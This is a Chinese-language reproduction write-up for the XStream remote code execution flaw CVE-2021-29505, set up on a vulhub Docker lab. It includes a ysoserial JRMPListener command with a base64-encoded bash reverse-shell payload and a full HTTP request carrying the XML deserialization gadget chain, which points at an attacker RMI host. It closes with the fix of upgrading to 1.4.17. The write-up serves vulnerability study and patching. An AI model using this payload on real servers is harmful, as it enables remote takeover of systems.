XStream遠程代碼執行(CVE-2021-29505 )
一、簡介描述
XStream是一種OXMapping技術,是用來處理XML文件序列化的框架,在將javaBean序列化,或將XML文件反序列化的時候,不需要其它輔助類和映射文件,使得XML序列化不再繁瑣。攻擊者可以操縱已處理的輸入流並替換或注入對象,從而執行從遠程服務器加載的任意代碼。
二、影響版本:
XStream <= 1.4.16
三、環境搭建:
https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml
文件:docker-compose.yml
version: '2' services: web: image: vulhub/xstream:1.4.16 ports: - "8080:8080"
docker-compose up -d
鏡像已經啟動:
訪問地址:http://192.168.0.106:8080/
四、漏洞復現
啟動服務:
反彈目標需要base64加密:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,L2Jpbi9iYxxxxxxxxPiYx}|{base64,-d}|{bash,-i}"
執行過程截圖:
執行poc:
獲取反彈shell:
詳細數據包:
POST / HTTP/1.1 Host: 192.168.0.106:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/xml Content-Length: 3115 <java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>192.168.0.102</string> <int>1098</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>192.168.0.102</host> <port>1098</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>
五、漏洞修復:
將xstream升級到1.4.17或以上版本。(在maven的/pom.xml中替換高版本xstream)
<dependency> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream</artifactId> <version>1.4.17</version> </dependency>
參考:
https://mp.weixin.qq.com/s/dh7Ewg7Pp-pg3mkLuUv9Rg
https://blog.csdn.net/weixin_45728976/article/details/116942969
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
如果本文內容侵權或者對貴公司業務或者其他有影響,請聯系作者刪除。
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人博客園:https://www.cnblogs.com/thelostworld/
FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article
語雀博客主頁:https://www.yuque.com/thelostworld
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
